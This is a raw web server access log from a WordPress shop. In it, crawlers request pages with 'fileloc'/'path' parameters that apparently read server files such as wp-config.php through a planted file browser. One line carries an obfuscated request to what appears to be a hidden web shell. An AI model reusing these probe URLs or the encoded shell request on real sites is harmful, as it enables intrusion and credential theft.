216.73.216.191 - - [25/Oct/2025:12:22:56 +0000] "GET /products/34909200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-mail.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 5265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:56 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fsite-title%2Fstyle.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2.0" 200 2359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:22:56 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/livehelper/php71 HTTP/2.0" 200 2765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:22:57 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt%2Fcanvas-demo-simple.py&path=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt HTTP/2.0" 200 2639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:57 +0000] "GET /products/11892016.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-config.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:57 +0000] "GET /products/19665536.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fxmlrpc.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:57 +0000] "GET /product/'?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fmodules%2Fposts%2Fskins HTTP/2.0" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:58 +0000] "GET /products/49127984.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:58 +0000] "GET /products/49115920.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-cron.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.28.118.16 - - [25/Oct/2025:12:22:58 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/gconv/IBM1147.so&path=//lib64/gconv HTTP/1.1" 200 28176 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:22:58 +0000] "GET /product/'?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor%2Fincludes%2Fsettings HTTP/2.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:59 +0000] "GET /products/36674928.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:59 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11%2Fqueue.py&path=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11 HTTP/2.0" 200 5033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:22:59 +0000] "GET /products/47884976.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:00 +0000] "GET /product/'?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss%2Fcustomize-preview-rtl.min.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss HTTP/2.0" 200 2972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:00 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch HTTP/2.0" 200 3125 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:00 +0000] "GET /products/36673664.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:00 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fplugins-old%2Felementor-pro%2Fchangelog.txt&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fplugins-old%2Felementor-pro HTTP/2.0" 200 47835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:00 +0000] "GET /products/21148672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fxmlrpc.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:01 +0000] "GET /products/36673856.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:01 +0000] "GET /products/36670672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-config.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:01 +0000] "GET /products/36668608.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:02 +0000] "GET /products/11880672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-settings.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 8223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:02 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fthemes%2Fwoodmart%2Fwoocommerce%2Fcontent-product.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fthemes%2Fwoodmart%2Fwoocommerce HTTP/2.0" 200 3981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:02 +0000] "GET /products/47889600.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-config.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.45.15.233 - - [25/Oct/2025:12:23:02 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/gconv/IBM277.so&path=//lib64/gconv HTTP/1.1" 200 27932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:03 +0000] "GET /product/'?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss%2Fadmin-bar-rtl.min.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss HTTP/2.0" 200 5876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:03 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/akaunting HTTP/2.0" 200 3189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:03 +0000] "GET /products/36675456.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:03 +0000] "GET /products/49114528.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-config-sample.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:03 +0000] "GET /product/'?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fplugins-old%2Fupdraftplus%2Fmethods HTTP/2.0" 200 3405 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:04 +0000] "GET /products/11890672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.130 - - [25/Oct/2025:12:23:04 +0000] "GET /m57911693432 HTTP/1.1" 200 25110 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.191 - - [25/Oct/2025:12:23:04 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fgroup%2Ftheme-rtl.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fgroup HTTP/2.0" 200 2327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:04 +0000] "GET /products/45639200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-mail.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 5265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:05 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fuploads%2Fstm_uploads%2F.htaccess&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fuploads%2Fstm_uploads HTTP/2.0" 200 2384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:05 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fgroup%2Feditor-rtl.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fgroup HTTP/2.0" 200 2556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:05 +0000] "GET /product/'?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fplugins-old%2Fwoocommerce-square%2Fincludes HTTP/2.0" 200 3208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:06 +0000] "GET /products/39538416.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:06 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmsimple HTTP/2.0" 200 3140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:06 +0000] "GET /cart?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fim243c45 HTTP/2.0" 200 2752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:06 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus%2Fimages%2Fother-plugins%2Faios.png&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus%2Fimages%2Fother-plugins HTTP/2.0" 200 11794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.212.145.46 - - [25/Oct/2025:12:23:06 +0000] "GET /?path=//usr/share/licenses/libzip HTTP/1.1" 200 14256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:06 +0000] "GET /products/36664720.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:07 +0000] "GET /product/'?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss%2Fdashicons.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fcss HTTP/2.0" 200 37539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:07 +0000] "GET /products/21147376.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:07 +0000] "GET /products/11884880.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:08 +0000] "GET /products/17397392.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:08 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11%2Fopcode.py&path=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11 HTTP/2.0" 200 5307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:08 +0000] "GET /products/19677168.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:09 +0000] "GET /products/49114032.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-cron.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:09 +0000] "GET /products/34909200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:09 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/ostic/images HTTP/2.0" 200 2655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:09 +0000] "GET /products/11880672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fxmlrpc.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:09 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.min.js&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fjs%2Fjquery HTTP/2.0" 200 33329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:10 +0000] "GET /products/36674384.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:10 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11%2F_py_abc.py&path=%2F%2Fopt%2Falt%2Fpython-internal%2Flib64%2Fpython3.11 HTTP/2.0" 200 4104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.83.10.183 - - [25/Oct/2025:12:23:10 +0000] "GET /custom-t-shirts/?fileloc=//scripts/build_bandwidthdb_root_cache_in_background&path=//scripts HTTP/1.1" 200 13932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:11 +0000] "GET /products/36661968.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:11 +0000] "GET /products/47887024.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:11 +0000] "GET /products/39540816.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:12 +0000] "GET /products/47885200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.154.14.66 - - [25/Oct/2025:12:18:12 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339383239322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343639322q6263323830353037323065646561626431343134656330353365386334636236222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 504 16384 "-" "-"
216.73.216.191 - - [25/Oct/2025:12:23:12 +0000] "GET /products/45639200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:12 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt%2Fmenu-simple.py&path=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt HTTP/2.0" 200 3338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:12 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/webasyst/php71 HTTP/2.0" 200 2693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:12 +0000] "GET /products/21151296.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:13 +0000] "GET /products/11887648.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:13 +0000] "GET /products/36662016.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:13 +0000] "GET /products/21156784.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:14 +0000] "GET /products/17399344.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-settings.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 8223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:14 +0000] "GET /products/49118736.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:14 +0000] "GET /products/11890096.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
